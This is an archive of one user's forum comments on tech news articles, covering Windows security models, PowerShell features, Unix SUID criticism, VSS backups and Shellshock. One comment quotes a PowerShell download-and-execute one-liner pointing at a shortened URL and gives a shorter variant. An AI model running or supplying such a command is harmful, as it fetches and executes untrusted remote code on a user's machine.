* Posts by Uffe Seerup

88 publicly visible posts • joined 10 Dec 2007

Page:

NSA urges orgs to use memory-safe programming languages

Uffe Seerup

Re: Best of all

Vulnerabilities comes in classes. One such class is memory corruption vulnerabilities. These are particularly nasty because then can often lead to remote code execution.

Some languages eliminate this class of security bugs completely. Garbage collected languages (e.g., C#, Java, Ruby) and borrow checking languages (e.g., Rust) are languages that eliminate memory corruption bugs.

The advice is sound. Given that memory corruption often allows RCE, it makes sense to use a language where memory corruption is simply not a concern.

Devs getting stuck into Windows 10X on Surface Neo will have to tussle with UWP

Uffe Seerup

Re: Some applications will run...

"Win32" is the previous name for what is now called "Windows API". It is *both* a 32bit and 64bit api.

https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list

"Using the Windows API, you can develop applications that run successfully on all versions of Windows while taking advantage of the features and capabilities unique to each version. (Note that this was formerly called the Win32 API. The name Windows API more accurately reflects its roots in 16-bit Windows and its support on 64-bit Windows.)"

Now please correct the article's misleading claims.

There is no reason to believe that Windows containers on a 64bit Windows OS will only be able to run 32 bit Win32 (Windows API) applications. In fact, knowing how containers merely are a virtualization of the host OS, it would be *hard* and require extra effort to constrain the container to 32bit applications.

A 64bit Windows is able to run 64bit Win32(Windows API) applications *and* 32bit Win32(Windows API) applications.

There is no such thing as Win64. Some has used Win64 as a short for 64 bit Windows. This confusion er why MS has tried to "rename" the API from Win32 to Windows API. With limited success, it seems.

Uffe Seerup

author conflates Win32 and 32 bit applications

It appears that author conflates Win32 and 32 bit applications. Win32 the the *name of the API*, not a reference to the bitness of the machine*. The legacy API on Windows x64 is *still* referred to as Win32 - even though it is used by 64 bit applications on a 64 bit OS.

Certainly, Windows containers (yes, that is a thing) are 64bit on a 64bit OS, and will run both 64bit Win32 and 32bit Win32 applications.

Win64 - which author mentions - is not a thing.

Admittedly, Microsoft has not helped with their naming scheme. I suspect that the name obfuscation dept. of Microsoft takes up an entire building on their campus.

*) Ok, it was once, when MS needed to distinguish the new API in Windows 95 from the old 16bit API of Windows 3.x.

That magical super material Apple hopes will hit backspace on its keyboard woes? Nylon

Uffe Seerup

Re: Apple keyboard malfunction issues and IFixit.

Strictly speaking it was a CR+LF lever. If you didn't pull it gently, it would add a LF at the end of the CR

Windows Subsystem for Linux adds pop to release, SAC-T sacked, crypto-jacking apps: It's Microsoft's week

Uffe Seerup

Re: Shouldnt it be LSW, Linux Subsystem for Windows instead

> Shouldnt it be LSW, Linux Subsystem for Windows instead?

No, not really. There is no GNU/Linux in there. The original "core" kernel which was developed to support multiple operating systems (initially Windows and OS/2), for a short period served SFU, has now been adapted to "act as" a Linux kernel. Windows architecture is really advanced in this regard. The core system was created with a flexible process/thread model which allowed multiple process/thread paradigms to be adapted. A Linux thread is not merely a Windows thread emulating a Linux thread, it is a core thread with no Windows in it.

PowerShell comes to MacOS and Linux. Oh and Windows too

Uffe Seerup

Restartable (across system restart) powershell scripts

> I would like to know more. Really need this is some of my scripts.

See this article:

https://blogs.technet.microsoft.com/heyscriptingguy/2013/01/23/powershell-workflows-restarting-the-computer/

When using Powershell to script "workflows" a subset of powershell cmdlets are supported. IIRC you can create a "script step" if you want to use non-workflow cmdlets.

Microsoft hits new low: Threatens to axe classic Paint from Windows 10

Uffe Seerup

Re: The end

> I too liked it for manipulating screenshots, until I discovered Snipping Tool buried in the start menu. Why hadn't I run across this before?

Have you ever tried Windows-R, type "psr", Enter?

PSR = Problem Steps Recorder. But what it really does is to document a series of user interface steps with multiple screenshots, showing mouse and documenting what was clicked.

Penguins force-fed root: Cruel security flaw found in systemd v228

Uffe Seerup

Surprise

Once again, the deliberate hole in the *nix security model - SUID/setuid - is at the core.

Microsoft's HoloLens secret sauce: A 28nm customized 24-core DSP engine built by TSMC

Uffe Seerup

There is an airgap

The design has 2 "rings" - an inner and an outer ring. The inner ring is lined with soft foam and is adjustable to your head. The outer ring (small gap in the back to allow access to inner ring tightener) contains the electronics - where the heat will be generated.

It is quite obvious from the images: https://www.microsoft.com/microsoft-hololens/en-us

Windows 10 debuts Blue QR Code of Death – and why malware will love it

Uffe Seerup
FAIL

The Register Fails

> . Fake a system crash by popping up a blue screen, show a QR code that links to a malicious website, and fool someone into opening it on their browser.

2 problems with that thinking:

1. How do you fake a system crash without already having control of the computer? No, a browser will not do - you cannot take over the entire screen. For a browser to take over the screen, the user must perform an explicit action, and even then there are clues on the screen that it is but a browser and that you can just hit ESC to return.

2. If it was so easy, why are malware not doing this already? Do you really think average Joe needs to know (or will even know) that Microsoft started using QR codes on BSODs? If Joe in inclined to fall for this, surely there's no reason to wait for Microsoft to start using QR codes?

Microsoft lures top Linux exec from Oracle to Redmond

Uffe Seerup

Re: Microsoft Linux Container OS with NT kernel

> The NT kernel source leaked out years ago. What a barrel of laughs that was, to the people who could look without tainting their own work

Oh, you mean this?

https://www.thetfp.com/tfp/tilted-technology/46375-article-leaked-windows-source-code-print.html

"Despite the above, the quality of the code is generally excellent. Modules are small, and procedures generally fit on a single screen. The commenting is very detailed about intentions, but doesn't fall into "add one to i" redundancy".

Apple's fruitless rootless security broken by code that fits in a tweet

Uffe Seerup

Re: No magic bullet

> and Windows, starting as a single user system, has found it difficult to build security in

The current strain of Windows has nothing to do with the single-user 9x strain. Windows NT was a clean-room re-implementation of Windows, with security and authentication built in from the start in an *extensible* model that was prepared for future enhancements. Windows 2000, XP, Vista, 7, 8 and 10 are all based on the same security model.

And it solves all of your complains about Unix.

> First, instead of accessing storage on their own user processes should go through a back-end with specific permissions

Windows (and Linux/Unix) already goes through a back-end (known as syscalls) when accessing resources. This is an ideal place to enforce security restrictions. Linux allows LSMs to intercept syscalls and perform extra access checks. Windows tokens are far more advanced than the Unix model and has catered for this type of security access checks from the start.

However, only Unix/Linux came up with the stupid idea of creating a deliberate hole in the model when they chose to elevate a single user (uid 0) to "god", by creating bypass code in every syscall to just let root through. There is no similar hole in Windows: All users - including administrators - are just users and must pass through the same security checks. Admins are only admins because of the permissions *granted* to the accounts.

> Secondly, introduce a concept of application permissions that sits alongside user permissions

Windows AppContainers (not to be confused with docker containers) was introduced in Windows 8 - and leverages the same token based security that is in Windows since the first Windows/NT. When the token contains a special SID, the process is restricted *beyond* what the user can do, i.e. *both* the user *and* the application must have explicitly granted access to a resource for the process to be able to access it.

https://msdn.microsoft.com/en-us/library/windows/desktop/mt595898(v=vs.85).aspx

> Thirdly, and this is where something like Apple's idea comes in, the kernel would lock root out from changing such storage on its own account; it would need to be authorised by a specific user, such as odf-admin for instance, to de-allocate odf storage.

And that is where is Unix model fails. Big time. This is yet another SUID/setuid fiasco. A security model where you gain *extra* privileges from the process that you run is a deliberate (but *stupid*) security hole.

What you want is to get rid of the "god" account and use discretionary privileges instead. The user's permissions should be an *upper bound*. If he/she needs to perform an action that requires permissions he/she does not hold, he/she must interact with a service instead. The service can perform authorization checks, but under NO circumstance should the process run within the requesting user's context. This latter part is why vulnerabilities such as shellshoch were so devastating.

Attackers packing malware into PowerShell

Uffe Seerup

Re: So...

> ...it has to get past your email spam defenses,

> then pass the AV defenses,

> then it's in.

Nope. Delivered through a browser or email client, the Word document file will be tainted with the "internet zone". Upon seeing that, Word will by default open the document in protected view mode.

What this means is that the process running Word will be running with low integrity mode (same as protected mode in Internet Explorer, same as Google Chromes sandbox on Windows). Macros are disabled in protected view. Even if there was an exploitable memory corruption bug, the Word instance is still sandboxed.

https://blogs.technet.microsoft.com/office2010/2009/08/13/protected-view-in-office-2010/

Uffe Seerup

Re: The power of PowerShell

> iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

a bit shorter:

iex (iwr http://bit.ly/e0Mw9w)

awesomeness ensues...

Linux fans may be in for disappointment with SQL Server 2016 port

Uffe Seerup

Re: Perfectly understandable (not)

> I wonder how other DB systems like DB/2, Oracle and MySQL have done it so far on Linux without it

In the absence of an operating system feature, they rely on their customers to hire sysadmins who will code bash scripts that will shut down DB servers (or "quisce" them) during the backup operation, reach into VMs using ssh and perform similar functions, all to be maintained by the sysadmin with high job security.

Or the customers will just take the risk and assume that the restore will work and hope that the roll-forward will not take too long.

> SQL Server is so inter-linked to the underlying OS that it actually needs that feature to work properly?

No, you can also just copy SQL Servers database and transaction log files, and it will be restorable, just like Postgres, Oracle etc. However, just like those systems, it will see a restore from such an unsynchronized state as the equivalent to a power failure and start rolling the transaction logs forward from the last checkpoint.

Oracle on Windows also registers itself as a VSS writer - i.e. it will take part in the VSS protocol when a system snapshot or backup occurs. The rest of Windows has a lot of other VSS writers, e.g. DNS, DHCP etc, ensuring that information is syncronized across the board.

But hey - you can get by without. It just involves some more work and a little higher risk.

Uffe Seerup

Re: Perfectly understandable

> It's this "new" technology called taking a snapshot of the VM, and backing up the snapshot through the hypervisor's storage APIs

So, how will an Oracle RDBMS instance inside a VM ensure that it had flushed all "dirty" pages to disk when the snapshot occurs? If it did not ensure the disk state was consistent at the time of the snapshot, it *will* look as a power failure if you ever restore the disk.

You could of course just bring the VM back directly in running state. That will mess up every single one of it's network connections, however. I sure hope this is not your server backup strategy.

> and if the Backup software has any worth, it will issue a quiescent command to the VM's DB application before taking the snapshot.

So, how does your backup software, running at the VM host reach into the VM guests, discover the DB applications *and any other running application which may need to flush state* to issue a quisce command?

What if the backup software could ask the operating system for a list of "quisce" targets, and issue a quisce command upon backup automatically? What if the hypervisor was a quisce target which - recursively - discovered quisce targets within the VM guest and issued quisce commands to those as well?

That would be cool, wouldn't it? That is actually what Windows VSS is. Read here: https://en.wikipedia.org/wiki/Quiesce

That is an *enterprise* feature. By offering it as an operating system service, backup software does *not* need to know about all of the types of DB systems and other services which would need "quisce" upon backup. Services do not need to know about backup software.

>It doesn't make much sense to back up a hosts' drives

Oh? Seems to me that backing up the host system (including all drives) by snapshotting and then dump the snapshot to external backup storage makes a lot of sense, especially if the backup software is not just disk oriented, but *application* oriented, i.e. if I could backup the host VM, but upon restore just ask to restore a single VM, and have just the host files back that represent the virtual disks and memory of the VM. Which is what Windows VSS does.

Uffe Seerup

Re: Perfectly understandable

> what 'enterprise-scale features' are you referring to?

One example would be Volume Shadow Copy Service (https://technet.microsoft.com/en-us/library/cc757854(v=ws.10).aspx)

Database systems on Windows (like Oracle and SQL Server) are declare themselves as VSS writers. Simarly, backup software (both the built-in as well as 3rd party) declare themselves as VSS requesters.

What this means is that the backup software will notify the VSS service when a system is backed up. The VSS service coordinates safe backup points with the VSS writers. Upon request from the VSS service, the VSS writers will flush in-memory structures to disk, ensuring a restore-consistent image.

Without something like the VSS service, restoring a snapshot of a system will appear to the database system as a power failure. A good RDBMS will overcome this by rolling transaction logs forward - but at the expense of a longer restore process.

With VSS the database system will see the image as consistent - as if the RDBMS had been shut down during the backup - and will *not* require expensive replays of transaction logs.

This is an *enterprise* feature: To be able to do a consistent system backup on a running system.

VSS even integrates with Hyper-V, meaning that if you start a backup process on the *host* - which owns the disks being backed up - the host will signal the VSS protocol through the hypervisor ensuring that any VSS writer within a virtual machine guest are coordinated with the host system backup.

Consider a virtual machine setup with Linux guests. You backup the host with all of the disks. How do you ensure that the guests are backed up at a consistent point-in-time? How do you ensure that processes/daemons running in the VM guests flush their memory to disk just when the disks are backed up?

Microsoft releases major PowerShell update after long preview

Uffe Seerup

Re: A shortsighted view

> Want to run the same command on 10 different servers, at the same time?

In powershell

icm (gc hosts.txt) {ps}

To get a list of prpcesses running on all the computers listed in the hosts.txt file. The command (ps) is executed simultaneously on all hosts and the result is consolidated into a single list of processes, each with a property indicating which remote host it was received from.

Care to explain how this is a problem?

Mostly Harmless: Google Project Zero man's verdict on Windows 10

Uffe Seerup

> The registry for example is basically a one-stop-shop for everything on the system and has no concept of restricting apps access to their own area.

The registry has access control list (ACLs) on each key. You absolutely need to have been granted access to read, write etc. for each key in the registry - albeit it inherits parent ACLs by default just like the file system.

This would be akin to each *line* of a config file in *Nix having it's own ACL. So there is absolutely a way to restrict apps access. And it commonly done.

> UAC is less of a security feature and more of a button to absolve MS of any responsibility if the program you're running messes your system.

UAC is a security feature (it helps keep a system secure) but not a security *boundary*. The same way that because of SUID root, *Nix security is also not a security boundary (unless SELinux or similar is applied).

> While it would break compatibility with loads of applications I think MS should look at moving away from the registry

Through support for ACLs, the registry already has full support for app containment. Windows "modern" apps run in app containers, and because the security model (with an extensible token) allowed it, it fits nicely with the existing model.

Temperature of Hell drops a few degrees – Microsoft emits SSH-for-Windows source code

Uffe Seerup

Re: POSIX

> Windows is not a fully OO environment - most of the Win32 API is a C one

Even the original C based APIs use the concept of *handles* and *object types*. The handles are actually references to objects, the dynamic virtual method table for an object is created when it is "opened". So yes, the fundamental design philosophy of Windows was always object-oriented, even if the actual method of implementation has gone through several iterations. The object-orientation is why - even today - the model fits well with a PowerShell model.

Unlike *Nix, the object permissions in Windows are established when the object is opened or created. You ask for a set of permissions and - if granted - corresponding methods will be pointed to by the dispatch table of the object. Slots for methods corresponding to permissions you didn't ask for will point to a "denied" method. This has the obvious advantage that 1) Windows does not need to check permission on each "syscall" - it's encoded in the way the DMT is set up and 2) handles can be passed to lesser privileges processes - as they point to the same DMT they will inherit the permissions.

Microsoft drops rush Internet Explorer fix for remote code exec hole

Uffe Seerup

Re: Pro Tip

> A simple fix for this is to not allow browsers to run under admin accounts by default.

If you do not turn off UAC - you are never running with admin capability by default on Windows. On Windows - unlike Unix - your identity is separated from your privileges.

When you log in using an administrator account, you retain the identity, but all administrative privileges are stripped from the *token* that is created. Security tokens on Windows are infinitely more capable than the naive Unix "effective user" thingy.

Hold that upgrade: Critical bug in .NET 4.6 'breaks applications'

Uffe Seerup

Re: So What's the Solution?

There's a registry setting that controls whether the new JITter or the old one is to be used. Set the JITter to the the classic one until this problem has been fixed.

Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet

Uffe Seerup

Re: Congratulations on repeating exploits before they can be fixed

> Congratulations on repeating exploits in detail before they can be fixed by anyone...

When Stefan Esser tweets it, you can consider it in the public domain. At that point, raising awareness can be seen as a service to the public. El Reg does us all a service here.

I agree that security researchers should not just blurp out exploit code. I totally support responsible disclosure. But once it is out there, the bad guys certainly know about it. Telling the good guys about it so that they can prepare for it is a good thing.

Apple has fixed this in a beta of OS X. If they believe that they can silently fix security errors and nobody will know about them until they publish the advisory, then Apple is being *incredibly* naive.

I would venture a guess that Stefan Esser has diff'ed the binaries or diff'ed decompiled binaries for changes between the same utilities in different versions. Any change is potentially a security hole that has been fixed.

This is trivial, especially if you are actively looking for security vulnerabilities. Publishing code with fixed vulnerabilities is even better (from a bad guys view) then disclosing through an advisory: At that point you have everything needed to create an exploit, and the potential victims are unaware of the threat, and thus cannot defend against it.

This one would light up with the extra checks on the allowed paths. From there it is easy to infer that the current version does something incomplete.

> Yellow journalism.

It doesn't mean what you think it means.

> However, the article does not Emphasise that you must first have privileged access through an app. Double yellow, click bait.

A compromised Firefox or Safari process is a local user. This will allow an attacker to go full root on a system from there. But I am sure that there is no chance of a vulnerability in Firefox or Safari? or mail clients? or SSH?

Are you one of those who also dismisses threats of malware against OS X by referring to how it will ask you for a password before installing anything? Well, with this one there will be no password prompt, but attacker can install anything.

Uffe Seerup

The real culprit

Is the deliberately holed *nix security model. Once again a SUID/setuid utility strikes.

Because of SUID, the *nix security model is not a security boundary. A security boundary guarantees that every access is checked against an access policy or permission set. By design, the *nix model is that if you are root you bypass all security checks.

It is a deliberate hole, drilled in the model out of necessity since the model is otherwise not capable of expression necessary permissions in modern environments.

This is going to bite again and again like it has been responsible for numerous vulnerabilities and exploits in the past.

Microsoft attaches Xbox stream bait to Windows 10 hook

Uffe Seerup

Streaming high-end games to rendered on XBox One to laptops and tablets

Or even play multiplayer on separate screens (XBox + Win 10 PC) streamed from the same XBox.

That's why.

Even without a beefy GPU you can stream the game to a laptop or tablet, which incidentally can also connect the XBox controllers.

More here: http://www.xbox.com/en-US/windows-10

OPEN WIDE: Microsoft Live Writer authoring tool going open source

Uffe Seerup

Re: What licence?

> Microsoft have made source code available before, with a license that said something like: "If you could have seen this source code, and you ever make money out of software in future, Microsoft can sue you for copyright infringement.

In the past Microsoft has released some source code under a *shared* source license. Maybe that's what you are thinking of. That is not *open* source, however, and Microsoft has never used the term "open source" to describe the shared source license.

Microsoft has been on a roll lately releasing products as *open* source. Each and every time Microsoft has said *open* source it has been an OSI approved license, usually MIT, Apache or MS-PL. Yes, MS-PL is also OSI approved.

It's 2015 and Microsoft has figured out anything can break Windows

Uffe Seerup

Re: Surely...

"Except they don't. Because - again, like a goddamned broken record - you are counting every security issue in every package of a distro against the core Windows OS, without regard to vulnerability type or severity."

Sorry, Trevor, but you are wrong. Let's take the latest full year (2014) . And let's take Windows 8.1 and compare to *just* the Linux kernel. From there on you can add X, Gnome/KDE to get to the same functional level as Windows 8.1. But just the kernel:

Linux kernel: http://www.cvedetails.com/vulnerability-list/vendor_id-33/year-2014/Linux.html

Windows 8.1: http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-26434/year-2014/Microsoft-Windows-8.1.html

Linux kernel, year 2014: 135

Windows 8.1, year 2014: 38

For the the year 2015 so far the numbers are 60/40 in Linux favor but keep in mind that it is not a full year and that it counts only KERNEL vulnerabilities for Linux versus ALL vulnerabilities for Windows 8.1

Let's go back to 2012-2013 then. Windows 8.1 did not have a full year of 2013, so let's compare Windows 7 to Linux (kernel only again) for 2013:

Linux kernel for year 2013: 189 vulns

Windows 7 for year 2013: 100 vulns.

Linux kernel for year 2012: 116 vulns

Windows 7 for year 2012: 44 vulns.

Again, contrary to your claims this is counting only Linux KERNEL vulns against a fully functional Windows.

So it would appear that you are incorrect, Trevor.

Wrestling with Microsoft's Nano Server preview

Uffe Seerup

Pets or cattle?

> But if it runs on its own hardware, say some kind of appliance, you may need some direct access if the network components don't work for some reason.

The mantra is: You should not manage your servers like your pets. You should manage them like your cattle. As Snover said: "If one get's ill you do not check it into the animal hospital - you fire up the barbecue". While I personally would not like to eat a sick animal, I totally get the idea when i comes to servers.

If a server becomes unresponsive you nuke it and re-install it using whatever method you used originally (PXE). Your environment based on PowerShell DSC or Chef or Puppet should ensure that the server comes up configured like the rest of the hoard. If that fails you discard it.

You have to consider that the target for Nano is not your basement hobby server. It is servers on (huge) datacenter scale *and* single workload VMs.

When the datacenter is built from containers with hundreds or thouands of servers in each container - you do NOT send in a repairman (veterinarian) when one misbehaves. You disable it and chalks it up to cost of doing business. When enough servers have failed you may consider refurbishing them.

Your infrastructure should already be resistant to server failures. As soon as a server fails, workload should shift to other servers, either as part of clustering or hot-standby or super-fast provisioning. Either way, the only reason to try to salvage a server should be HW savings - not to make services available again. If you depend on salvaging a bad server for availability to services you are doing it wrong.

Which means that you should have no rush. Whatever was on that server was redundant (in the sense that it is available elsewhere) and you can just re-commision it at a time of your choosing and with no regard to data. I.e. re-install.

Uffe Seerup

The why and what for

Per Microsofts Jeffrey Snover (chief architect for Windows server), Server Nano is *primarily* a scratch-your-own-itch refactoring.

The biggest user of Windows Server - by far - is Microsoft Azure. If you can save 25% on the size, you can increase VM density by 20%. If you can save 50% you can double the VM density.

Harddisk footprint has been reduced with a factor 20. That is a *massive* saving once they scale to Azure.

OS RAM usage is down considerably as well. The fewer features means fewer patches (both bugfixes and security patches) and consequently fewer reboots. Microsoft investigated how many of the patches in 2014 that touched the components in Nano and concluded that 80% of patches would not have been required, as they concerned components not in Nano.

But to turn the question around? Why does a *server* - by definition a machine whose primary task is to run a workload - need to have a *command interpreter*, a *shell* and an *editor* - even if it is very basic.

Why should you need to log in to a machine over SSH, start a command interpreter on the server and issue commands? Why would you want a Ruby interpreter? All extra components has to be maintained and adds to the attack surface.

Microsoft has come to this realization late, but at least they now go the whole way and may very well take it a bit further.

Ideally the remote server is "just a server" with a standard interface to control and configure it and no way to log in locally. That is what Server Nano is.

Btw, PowerShell has this nice property that it can submit "script blocks". Script blocks are semi-compiled script, so while MS will still need some PowerShell infrastructure on Nano, they could very well cut away the *shell* part of it - leaving only the execution engine. Already today - if you use PowerShell remoting - you can send scripts to the remote that is not just text. They are parsed and turned into a PS script block locally and then sent to the remote PS engine. The upshot is that you can create scripts that refer to *local* script files but execute them remotely. PS will send the parsed scripts blocks for those files across the wire.

Microsoft points PowerShell at Penguinistas

Uffe Seerup

It is a "platform play"

Yes, it aims at solving some of the same problems as Chef, Puppet et al. But unlike those, PowerShell DSC follows industry standards for datacenter/enterprise management.

That said, PowerShell DSC is not at all comparable to the full-featured Chef/Puppet offerings. Instead (according to Microsofts Jeffrey Snover - the inventor of PowerShell) Microsoft would like other vendors to build management products on top of the open platform.

Chef and Puppet may be available as open source as well as commercial offerings - but they do not adhere to any published standards, hence you get locked-in when you base your datacenter management on one of those products.

DSC builds upon Management Object Format (MOF) files which can be used to declaratively describe the desired state of a node. MOF is an format standardized through the Distributed Management Task Force (DMTF) (see http://dmtf.org/) along with standards for interacting with nodes.

The open source OMI server for Linux implements the OMI standard of the Open Group. The OMI server takes the MOF files and applies the configuration to the nodes.

It is all open source and based on open industry standards supported by a number of tech companies.

Chef recipes are written i Ruby. By using Ruby in a clever fashion the recipes look almost declarative. But they are still Ruby. Imagine if Chef could use MOF files instead.

Microsoft HoloLens or Hollow Lens? El Reg stares down cyber-specs' code

Uffe Seerup

Re: No Holography In Evidence. It's More Of The Old 'Pepper's Ghost'.

Not so sure about that. Microsoft has not said anything either way, except for mentioning that they've had to develop a "holo chip".

I have quizzed some of my colleagues who were at Build and tried them. Specifically, they said that they focused on the objects in the real world, and that the holograms appeared sharp when focusing at the distance.

That, to me, suggests that there's more going on than simply stereoscopic lenses. If they were simply lenses that overlay an image a few centimeters from your eyes, the image would be blurred when you focus your eyes on an object 2 meters away. Try for yourself: Hold a finger in front of your eye and see if you can focus on that at the same time as you look at an object even just 50 cm away (and vice versa).

The limited viewport seems to be a dealbreaker. If they do not solve that it will see very limited usage.

But at this point you have absolutely *nothing* substantiating your claims that it is simply stereoscopic lenses, while there are at least some indication that there's more going on.

Entity Framework goes 'code first' as Microsoft pulls visual design tool

Uffe Seerup

Re: I ran into serious problems with EF

"LINQ supports data types that are queries, using a .NET array type where the variable itself uses lazy evaluation"

No, that is not how LINQ composes queries. LINQ supports IQueryable<T>. IQueryable can be composed with other queries, more clauses etc. In general, when you compose using IQueryable, the result will also be (should also be) an IQweryable.

"it doesn't retrieve or compute the result until your program actually accesses the value"

(Guessing here) It sounds like you are talking about a *property* with a *getter* which is then evaluated on each reference. If it does not return an IQueryable - it cannot compose lazily with other queries. If it is indeed an "array" type as you describe - that is definitively not the way to do it.

"For example, you can point your GUI to one of these, have it show 10 records from a query, if the query has 50 results it will only retrieve 1-10 until you scroll down. Well, in theory -- EF doesn't support these, it loads the whole enchilada (all 50 records) into RAM and then "lazily" loads values out of that in-memory copy as you use it (it doesn't generate any optimized SQL at all.)"

EF does indeed support paged queries. Use Skip() and Take(): Skip to skip n results, Take to retrieve the next m results. I suspect that you may be using some GUI element that does not use this EF feature.

Windows 10 feedback: 'Microsoft, please do a deal with Google to use its browser'

Uffe Seerup

Re: Stop. Just Stop.

> Fully agree. And your justifiable rant reminds me of the question I've been meaning to put to anyone more experienced with the windoze environment than I am.

You are looking for Windows Applocker: http://technet.microsoft.com/en-us/library/dd759117.aspx

(part of Windows since Windows 7 - before that there were software restriction policies).

With Applocker you can enforce a policy where executables are only allowed to launch from a few protected folders, such as Program Files and Program Files x86. Or you can set a policy that only select publishers are whitelisted, e.g. Microsoft, Adobe etc.

Vanished blog posts? Enterprise gaps? Welcome to Windows 10

Uffe Seerup

> What I don't really like is the requirement of having an online Microsoft account

There is no such requirement. In fact, I tried to set it up on a Surface Pro 3 (mistake) - but because it doesn't come with drivers for the SP3 (no Internet connection during install) I had *only* the local account.

But even if you *do* have a network, the Microsoft account is still optional.

Uffe Seerup

Shutdown is by default a mix between shutdown and hibernate

It is the *kernel* that hibernates. All user programs and user sessions are terminated.

When you show down, Windows sends shutdown signals to all user processes in all user sessions. The kernel and services in session 0 (including device drivers) are hibernated, i.e. the state is written to disk.

Upon start, Windows will check that the hw signature of the machine (ntdetect) is still the same, and if so it will read the state from disk rather than go through a full boot process.

If the drivers are up to it, you should not see any effect from this apart from the (much) faster booting.

Desktop, schmesktop: Microsoft reveals next WINDOWS SERVER

Uffe Seerup

Re: hate for powershell?

Trevor, you claim that PowerShell is generally despised as a means of day to day administration".

That's a very unspecific and unverifiable claim. When I come across an admin who uses arcane tools or self-automates through the GUI by manually following "manuals", I always demonstrate to them how they can accomplish the tasks using PowerShell. And the response is generally overwhelmingly positive. So I have the exact opposite experience from you; although like yours it is still anecdotal.

PowerShell *is* the primary tool. Through the module feature it has quickly grown to become the hub of CLI administration on Windows boxes. I dare you to find an area that can not be administered using PowerShell.

> But for standardised deployments, policy pushes, standardised updates or even bulk migrations any of the proper automation/orchestration tools are just flat out better.

The right tool for the job. On Windows there is still group policies which remains the most important vehicle for pushing policies. PowerShell is not intended to replace GPOs. PowerShell *can* fill the gaps where group policies cannot reach.

> And for those situation where you're fighting fires, an intuitive GUI is way better, especially for those instances where you're fighting fires on an application you haven't touched in months, or even since it was originally installed.

> This is - to put it mildly - a different role than is served by the CLI in Linux.

If you are "fighting fires" in an application you haven't touched in months and find the GUI better for that, how come you think the Linux CLI is better for that? If your problem is unknown/forgotten instrumentation, *discovery* is what you are after. A GUI can certainly help you there, but I frankly cannot see how a *Linux CLI* would offer more discovery.

In fact, PowerShell offers *much more* in the discovery department than any Linux CLI or scripting language. Granted, you have to be familiar with a few central concepts of PowerShell: Modules, naming convention, Get-Member, Get-Help, Get-Command. However, these are very basic concepts that you are not likely to forget even if youjust use PowerShell occasionally.

> The CLI in Linux is much more mature, with a multitude of scripting languages grown around it, and the majority of application configuration done as flat text files, not as XML. (Systemd can die in a fire.)

More mature? How about *old*? Case in point: The arcane bash syntax with its convoluted parser that has placed hundreds of thousands systems at risk.

Yes, the Unix tradition is to use plain text files. The Windows tradition is to use APIs, possibly backed by XML files. There are advantages and disadvantages to each approach. Personally, I prefer the API approach as it makes it easier to create robust scripts and procedures that will also carry forward in versions, even if the underlying format changes.

Uffe Seerup

Re: Powershell 5 and W7 / Svr2K8r2

It is the *preview* that installs exclusively on 8.1 and Server 2012R2.

I was looking for a source on which platform the *final* product will be available on.

PowerShell 4 was *also* platform limited during the preview phase, but was backported afterwards.

Uffe Seerup

Re: Powershell 5 and W7 / Svr2K8r2

> It doesn't look like Powershell 5 will be backported to Windows 7 or Server 2008/R2?

Source?

Uffe Seerup

Re: User Interface

> There are many UNIX shells, and it's impossible to compare all

> of them with Powershell and come out with the conclusion that

> "Powershell is the bestest",

Indeed, a comparison with the goal of crowning "the best" makes little sense. Not least because much of PowerShell makes sense mostly on Windows and would add little value on *nix systems. Conversely, the *nix shells with their line-text-centric processing is often at odds with Windows where you either need to control through APIs, XML or similar.

> ... has an interactive prompt that, from my trials, can only be

> accessed while "on" the machine or over RDP

Then you have not tried PowerShell since version 1.0. This first version had no built-in remoting, but could be used across SSH connections.

In PowerShell 2.0 a lot of remoting and job features were added. Many commands take a -ComputerName parameter where you can pass a list of hosts where the command should execute remotely but return the output to the controlling console. There is a general Invoke-Command that can execute commands, scripts, functions on remote machines simultaneously and marshal the output back.

Uffe Seerup

Re: User Interface

> Really? Get back to us when it can do full system job control.

For jobs control:

Debug-Job, Get-Job, Receive-Job, Remove-Job, Resume-Job, Start-Job, Stop-Job, Suspend-Job, Wait-Job.

Some of these have aliases for shorthand use:

gjb -> Get-Job, rcjb -> Receive-Job, rjb -> Remove-Job, rujb -> Resume-Job, sajb -> Start-Job, spjb -> Stop-Job, sujb -> Suspend-Job, wjb -> Wait-Job

For process control:

Debug-Process, Get-Process, Start-Process, Stop-Process, Wait-Process

Again, with aliases:

gps -> Get-Process, kill -> Stop-Process, ps -> Get-Process, saps -> Start-Process, spps -> Stop-Process, start -> Start-Process

You can start jobs on remote computers without first "shelling" into those. Output from the jobs are marshalled back to the controlling console. It even works if the remote job stops and query for a value (using Read-Host): The prompt will appear on the controlling console when you poll for output/status of the job.

Scripts can be workflows. Workflow scripts are restartable, even across system restarts.

So, between using a remote GUI admin interface and scripting, Windows Server is very well covered.

Uffe Seerup

Re: User Interface

> Let's hope the version has a user interface suitable for use on a server...

PowerShell 5

Stunned by Shellshock Bash bug? Patch all you can – or be punished

Uffe Seerup

Re: what else lurks

> Well, the attack is based on a feature of Bash.

No - it is a *bug*. The ability to define functions in env vars was the feature. The unintended consequence of using a poorly implemented parser was that it proceeded to *execute* text that may come *after* the function definition in the env var.

> This means that it's been "out in the open" for the entire existence of the feature

Nope. Nobody ever considered the possibility that extraneous text following such a function definition would be executed *directly*. At least, we *hope* that it was the good guys who found this first. But we really don't know.

> It also points out why it's a bad idea to have so much running with root permissions, besides not sanitizing input.

Yes. And why SUID/setuid is such a monumentally bad idea. It is a deliberate hole in a too simplistic security model.

> The equivalent on a Windows system would be to pass in PowerShell script and .NET binaries through the http request, and then run it all with Administrator permissions.

Not sure I agree. That is such an obviously bad idea that nobody would ever do it. Shellshock is - after all - a bug (unintended behavior). However, there are multiple historic reasons on Unix/Linux that tend to amplify this bug:

1: The (dumb) decision to use env vars to pass parameters through the Common Gateway Interface (CGI). Env vars are stubbornly persistent: They are inherited by all child processes. This serves to make security auditing much harder: You cannot simply audit the script that *received* control directly from CGI; you also has to consider all processes that can ever be launched from the script, its child processes or descendants.

